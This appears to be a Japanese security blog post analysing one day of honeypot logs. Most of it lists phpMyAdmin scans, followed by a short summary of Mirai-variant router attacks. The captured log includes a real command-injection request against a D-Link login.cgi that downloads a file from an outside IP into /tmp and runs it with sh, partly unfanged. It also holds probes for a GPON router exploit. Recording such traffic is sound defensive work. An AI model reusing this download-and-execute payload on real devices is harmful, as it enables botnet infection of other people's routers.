S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypotの簡易分析(48日目)

WOWHoneypotの簡易分析(48日目)

honeypot

WOWhoneypotの2018/07/21(運用48日目)の簡易分析です。
本日の総アクセス件数は 153件です。以下が全アクセスログです。

35 2018-07-21 GET /
5 2018-07-21 GET /pma/scripts/setup.php
5 2018-07-21 GET /phpmyadmin/scripts/setup.php
5 2018-07-21 GET /myadmin/scripts/setup.php
4 2018-07-21 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
4 2018-07-21 GET /phpMyAdmin/scripts/setup.php
4 2018-07-21 GET /MyAdmin/scripts/setup.php
2 2018-07-21 POST /GponForm/diag_Form?images/
2 2018-07-21 GET /phpMyAdmin-2/scripts/setup.php
1 2018-07-21 HEAD /
1 2018-07-21 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-21 GET /xampp/phpmyadmin/scripts/setup.php
1 2018-07-21 GET /.well-known/security.txt
1 2018-07-21 GET /websql/scripts/setup.php
1 2018-07-21 GET /web/scripts/setup.php
1 2018-07-21 GET /web/phpMyAdmin/scripts/setup.php
1 2018-07-21 GET /typo3/phpmyadmin/scripts/setup.php
1 2018-07-21 GET /sitemap.xml
1 2018-07-21 GET /scripts/setup.php
1 2018-07-21 GET /robots.txt
1 2018-07-21 GET /php/phpmyadmin/scripts/setup.php
1 2018-07-21 GET /php-my-admin/scripts/setup.php
1 2018-07-21 GET /_phpmyadmin/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin3/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.4.3.1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.1.2.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.1.2.0-english/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.1.2.0-all-languages/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.1.1.0-all-languages/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.1.0.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.1.0.0-english/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.0.1.1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.0.1.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.0.1.0-english/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.0.0-rc1-english/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.9.2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.9.1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.9.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.9.0-rc1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.9.0.2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.9.0.1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.9/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.8/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.7/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.6/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.5/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.4/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.3/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.8.2.3/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.7.7/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.7.6/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.7.5/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.7.0-rc1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.7.0-pl2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.7.0-pl1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.7.0-beta1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.9/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.6/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.5/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.4-rc1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.4-pl4/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.4-pl3/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.1-pl3/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.6.1-pl2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.11.1-all-languages/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.11.1.2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.11.1.1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.11.1.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.11.0.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.10.2.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.10.1.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.10.0/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.10.0.2/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.10.0.1/scripts/setup.php
1 2018-07-21 GET /phpMyAdmin-2.10.0.0/scripts/setup.php
1 2018-07-21 GET /phpadmin/scripts/setup.php
1 2018-07-21 GET /mysql/scripts/setup.php
1 2018-07-21 GET /mysqladmin/scripts/setup.php
1 2018-07-21 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://104.244.72[.]82/k%20-O%20-%3E%20/tmp/k;sh%20/tmp/k%27$
1 2018-07-21 GET hxxp://114.215.240[.]151:83/index.php
1 2018-07-21 GET hxxp://114.215.207[.]183:83/index.php
1 2018-07-21 GET /forum/phpmyadmin/scripts/setup.php
1 2018-07-21 GET /favicon.ico
1 2018-07-21 GET /db/scripts/setup.php
1 2018-07-21 GET /dbadmin/scripts/setup.php
1 2018-07-21 GET /cpphpmyadmin/scripts/setup.php
1 2018-07-21 GET /cpanelphpmyadmin/scripts/setup.php
1 2018-07-21 GET /blog/phpmyadmin/scripts/setup.php
1 2018-07-21 GET /apache-default/phpmyadmin/scripts/setup.php
1 2018-07-21 GET /admin/scripts/setup.php
1 2018-07-21 GET /admin/pma/scripts/setup.php
1 2018-07-21 GET /admin/phpmyadmin/scripts/setup.php
1 2018-07-21 GET /administrator/components/com_joommyadmin/phpmyadmin/scripts/setup.php

phpMyAdmin関連(103件)と/を除外したアクセス数です。

4 2018-07-21 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
2 2018-07-21 POST /GponForm/diag_Form?images/
1 2018-07-21 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://104.244.72.82/k%20-O%20-%3E%20/tmp/k;sh%20/tmp/k%27$
1 2018-07-21 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-21 GET hxxp://114.215.240.151:83/index.php
1 2018-07-21 GET hxxp://114.215.207.183:83/index.php
1 2018-07-21 GET /.well-known/security.txt
1 2018-07-21 GET /sitemap.xml
1 2018-07-21 GET /robots.txt
1 2018-07-21 GET /favicon.ico

本日はZmEuで計4回、phpMyAdminのスキャンをされたようです。3IPは同じ6アクセスでしたが、1IPのみ大量にスキャンしていました。

それ以外は、
・家庭用GPONルータの任意のコード実行の脆弱性を狙うMirai亜種Masutaの攻撃
・D-LINKの脆弱性を狙うMirai亜種Shinoa/Satoriの攻撃
XDebugというPHPをリモートでデバッグするツールへの調査行為
・不正中継の調査
・サイトの構成調査
といったところです。

 

本日のハンティングログは以下です。Mirai亜種によるものです。

1 2018-07-21 wget hxxp://104.244.72[.]82/k

以上です。